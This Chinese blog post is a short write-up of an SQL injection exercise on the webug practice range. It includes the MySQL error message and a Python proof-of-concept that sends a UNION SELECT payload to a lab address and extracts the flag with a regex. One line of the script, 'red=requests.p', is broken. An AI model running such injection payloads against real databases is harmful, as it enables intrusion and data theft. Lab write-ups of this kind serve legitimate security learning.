用python写注入漏洞的poc
2024-09-02 09:44:58
webug靶场一道简单的注入题
加点后报错
could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
大致可以猜出是双引号的问题,闭合即可,接下来就是常规的注入过程,最后拿到flag
下面是代码
#-*- coding:utf-8 -*- import requests
import re def poc():
url="http://192.168.241.128/pentest/test/sqli/sqltamp.php"
data={
"gid":"-1' union select 1,flag,3,4 from flag #"
}
req=requests.get(url,data)
red=requests.p
html=req.content
html=html.decode('utf-8')
sear=r'名称为:(.+?)</font>'
flag=re.findall(sear,html) with open('test1.txt','w') as f:
f.write(str(flag)) if __name__ == '__main__':
poc()
这里我用正则匹配将flag匹配并写入文件,一定要对返回的数据进行转码
否则匹配不到,还有%23要写成#才能被python识别。
最新文章
- bzoj 1191: [HNOI2006]超级英雄Hero
- Spring3 整合MyBatis3 配置多数据源 动态选择SqlSessionFactory
- iOS开发之时间格式的转化
- 圆形imageview
- linux free命令中buffer与cache的区别
- CSS中的content和attr的用法
- C#中英文混合字符串过长截断
- vs2013+EF6+Mysql
- POJ 3318 - Matrix Multiplication 第一次用随机化解决问题...
- 探秘ReSharper8.1版本中Architecture(架构工具)的改进
- qlv格式转换成MP4格式
- python 生成html文件(表格)
- ZooKeeper 数据模型
- MIUI系统如何获取ROOT权限
- 用Promise对象实现的 Ajax 操作
- NOI.AC NOIP模拟赛 第二场 补记
- [ZHOJ1954]lyd的旅行
- Mac下使用ABTestingGateway快速搭建灰度网关
- C++解析(11):对象的构造
- 扩展KMP - HDU 4333 Revolving Digits
热门文章
- 惠州发布5G任务计划表,将出台智慧灯杆建设计划与技术规范
- CentOS下搭建禅道Bug反馈系统
- 使用wapiti进网站进行安全性测试
- GoLang 自学系列(二)—— defer
- 基于 MongoDB 动态字段设计的探索 (二) 聚合操作
- Django搭建示例项目实战与避坑细节
- 老猿学5G:多量纲计费与QoS的QCI、5QI、ARP、GBR和MBR
- moviepy音视频剪辑:使用rotate函数实现视频变换处理以及参数expand取值为True时的花屏问题解决方案
- 第15.25节 PyQt(Python+Qt)入门学习:Model/View开发实战--使用QTableView展示Excel文件内容
- CSP-S2020初赛游记